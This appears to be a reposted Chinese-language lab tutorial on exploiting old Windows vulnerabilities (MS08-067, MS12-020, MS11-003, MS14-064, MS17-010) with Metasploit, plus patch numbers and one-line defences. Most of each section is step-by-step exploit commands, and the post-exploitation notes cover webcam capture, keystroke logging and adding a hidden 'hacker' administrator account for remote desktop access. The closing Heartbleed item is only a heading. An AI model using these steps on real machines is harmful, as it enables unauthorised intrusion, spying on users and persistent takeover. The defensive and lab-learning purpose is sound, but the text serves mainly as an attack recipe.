常見的主機漏洞


常見主機漏洞

1.MS08_067

  • 利用端口:445

    類型:緩沖區溢出漏洞、遠程任意指令執行漏洞RCE

    范圍:win2000、xp、server 2003、vista、server 2008、7 Beta

    補丁:KB958644

    描述:如果用戶在受影響的系統上收到特制的 RPC 請求,則該漏洞可能允許遠程執行代碼。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系統上,攻擊者可能未經身份驗證即可利用此漏洞運行任意代碼。 此漏洞可能用於進行蠕蟲攻擊。

  • 操作步驟:

    環境:kali xp英文版

    利用工具 metasploit

    命令:

    msfconsole 
    
    search ms08_067
    
    use 0
    
    show options
    
    set rhosts xp'ip
    
    show target 34(7)
    
    show payloads
    
    set payload 44
    
    run/exploit
    
  • 實驗補充:

    webcam_stream 	打開攝像頭返回視頻流
    
    webcam_snap		打開攝像頭返回照片
    
    ps							展示當前運行的進程信息
    
    migrate [pig 號]		切換進程
    
    keyscan_start 		開始鍵盤監聽
    
    keyscan_dump		打印監聽到的內容
    
    keyscan_stop 		結束鍵盤監聽
    
    shell 進入到windows命令行下 whoami 查看當前賬戶是誰
    
    dir 查看文件
    
    net user hacker 123456/add
    
    net localgroup administrators hacker /add
    
    rdesktop xp'ip 打開遠程桌面登陸xp
    
  • 防御

    ​ 方法1:安裝補丁

    ​ 方法2:防火牆關閉445端口

2.MS12_020

  • 利用端口:3389(RDP協議)

    類型:緩沖區溢出漏洞、遠程任意指令執行漏洞RCE、拒絕服務漏洞

    范圍:xp、server 2003、vista、server 2008

    補丁:KB2621440

    描述:如果攻擊者向受影響的系統發送一系列特制 RDP 數據包,則這些漏洞中較嚴重的漏洞可能允許遠程執行代碼,或造成系統拒絕服務。

  • 操作步驟

    實驗環境 kali、win2003

    利用工具:metasploit

    命令:

    msfconsole
    
    search ms12_020
    
    use 1
    
    show options
    
    set rhosts win2003'ip /24
    
    run/exploit
    
    search ms12_020
    
    use 0
    
    show options
    
    set rhosts win2003'ip
    
    run/exploit
    
  • 防御

    方法1:安裝補丁

    方法2:防火牆關閉3389端口

3.MS11_003

  • 利用協議:HTTP協議
    漏洞類型:緩沖區溢出漏洞、遠程任意指令執行漏洞(RCE)
    影響范圍: IE6、IE7、IE8
    微軟安全公告:KB2482017
    漏洞描述:
    這些漏洞可在用戶使用 Internet Explorer 查看特制 Web 頁面或者用戶打開一個加載特制庫文件的合法 HTML 文件時允許遠程執行代碼。

  • 操作步驟

    環境:kali win7

    工具:metasploit

  • 命令:

    - msfconsole
    
      search ms11_003
    
      use 0
    
      show options
    
      set srvhost kali'ip
    
      show options
    
      set uripath a
    
      exploit/run
    
      sessions
    
      sessions 1
    
      shell
    
      whoami
    
    - 
    

    防御

    方法1:安裝補丁
    方法2 : 使用其他瀏覽器的最新版本

4.MS14_064

  • 利用協議:HTTP協議
    漏洞類型:緩沖區溢出漏洞、遠程任意指令執行漏洞(RCE)
    影響范圍: windows2003、2008、2012、vista、win7、win8
    微軟安全公告:KB3010788
    漏洞描述:
    OLE即對象連接與嵌入技術。OLE不僅是桌面應用程序集成,而且還定義和實現了一種允許應用程序作為軟件“對象”彼此進行“連接”的機制。Microsoft Windows處理特制OLE對象文件的方式中存在遠程代碼執行漏洞,成功利用后可允許攻擊者以當前用戶權限執行任意代碼。

  • 操作步驟

    ​ 環境kali win7

    ​ 工具 metasploit

    ​ 命令:

    msfconsole
    
    search ms14_064
    
    use 0
    
    show options
    
    show payloads
    
    set payload 50
    
    show  options
    
    set AllowPowershellPrompt true
    
    show options
    
    show targets
    
    set target 1
    
    show options
    
    run
    
    sessions
    
    sessions 1
    
    shell
    
    whoami
    
  • 防御

    方法1:安裝補丁
    方法2 : 不使用IE系列瀏覽器

5.MS17_010

  • 利用協議:SMB
    漏洞類型:緩沖區溢出漏洞、遠程任意指令執行漏洞(RCE)
    影響范圍: windows2003、2008、2012、2016、vista、win7、win8、win10(1511/1607版)
    微軟安全公告:KB4012598、KB4012212、KB4012215
    漏洞描述:
    如果攻擊者向 Windows SMBv1 服務器發送特殊設計的消息,那么其中最嚴重的漏洞可能允許遠程執行代碼。

  • 操作步驟

    環境kali win7

    工具 metasploit

    命令:

    msfconsole
    
    search ms17_010
    
    use 1
    
    show options
    
    set rhosts win7' ip
    
    run
    
    search
    
    use 2
    
    set rhosts win'ip
    
    run
    
    net user hacker 123 /add
    net localgroup administrators hacker /add
    ctrl+c
    rdesktop [win7的ip]
    
    • 防御:

      安裝補丁

    6.heartbleed漏洞


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM